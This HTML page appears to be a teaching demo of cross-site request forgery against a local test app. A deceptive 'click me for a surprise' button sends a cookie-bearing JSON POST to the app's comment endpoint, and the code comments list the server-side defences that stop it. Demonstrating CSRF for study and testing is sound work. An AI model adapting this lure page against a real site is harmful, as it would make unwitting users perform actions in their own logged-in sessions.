<!doctype html>
<html>
	<head>
		<meta charset="utf-8"/>
		<title>CSRF演示</title>
	</head>
	<body>
		嘿嘿,这是一个纯洁的页面。<br/>
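		<!--
			CSRF demonstration trigger for the local test application.
			An in-page action is a button with a bound listener, not a link with a
			"javascript:" URL, so the page also works under a Content-Security-Policy
			that forbids script URLs and inline handlers.
		-->
		<button type="button" id="csrf-demo-trigger">点我有惊喜</button>
		<script>
			/**
			 * Sends one credentialed JSON POST to the comment endpoint of the local
			 * demo application (http://localhost:8080/comment/add).
			 *
			 * What this exercises on the server side:
			 *  - withCredentials = true asks the browser to attach the cookies it
			 *    holds for the target origin, so the endpoint sees the visitor's
			 *    session if it authenticates by cookie alone.
			 *  - "application/json" is not a CORS-safelisted Content-Type. When this
			 *    page is served from another origin the browser sends a preflight
			 *    first, and the POST is delivered only if the server's CORS policy
			 *    accepts this origin together with credentials.
			 *
			 * Server-side controls that should make the request fail: a per-session
			 * anti-CSRF token checked on every state-changing request, SameSite
			 * session cookies, validation of the Origin / Referer header, and a CORS
			 * allow-list that does not reflect arbitrary origins.
			 *
			 * Takes no arguments and returns nothing; the response is not read.
			 */
			function doCSRF() {
				// Runtime payload, kept exactly as in the original demo.
				const payload = JSON.stringify({"iid": 2, "content": "点击来的,偷偷来点CSRF攻击!"});

				const request = new XMLHttpRequest();
				// Third argument true = asynchronous request.
				request.open("POST", "http://localhost:8080/comment/add", true);
				request.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
				request.withCredentials = true;
				request.send(payload);
			}

			// The button is parsed before this script runs, so the lookup succeeds.
			document.getElementById("csrf-demo-trigger").addEventListener("click", function () {
				doCSRF();
			});
		</script>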
	</body>
</html>
